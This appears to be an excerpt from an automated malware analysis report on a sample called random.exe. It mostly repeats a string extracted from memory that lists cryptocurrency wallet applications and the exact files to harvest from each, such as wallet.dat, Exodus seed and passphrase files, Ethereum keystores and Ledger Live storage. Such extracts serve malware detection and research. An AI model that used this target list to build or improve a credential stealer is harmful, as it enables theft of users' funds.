              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random.exe, 00000000.00000002.1873121673.000000000133A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fpon
              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: random.exe, 00000000.00000002.1879622600.000000000BBA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
